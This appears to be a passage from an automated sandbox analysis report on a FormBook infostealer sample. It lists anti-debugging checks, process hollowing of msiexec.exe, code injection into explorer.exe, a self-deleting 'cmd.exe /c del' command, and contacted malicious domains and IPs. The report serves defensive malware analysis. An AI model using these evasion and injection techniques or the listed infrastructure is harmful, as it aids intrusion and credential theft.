          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05046CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0509070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05008EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05094015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05094015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05082073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05091074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05043884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05043884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05095BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05004A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05004A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05054257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0500927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B14BB SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B14BB SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 2_2_001B14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.nzyyen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.221.90.236 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.204.150.5 80
          Source: C:\Windows\explorer.exeDomain query: www.higginsuotdoors.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: FD0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeMemory written: C:\Users\user\AppData\Local\Temp\rlpjf.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeThread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3968
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
          Source: explorer.exe, 00000003.00000000.281652753.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.324075506.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.360842490.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000003.00000000.365014333.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.281676164.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.308230377.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.324098848.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001AFE73 cpuid
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 1_2_001B0FE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
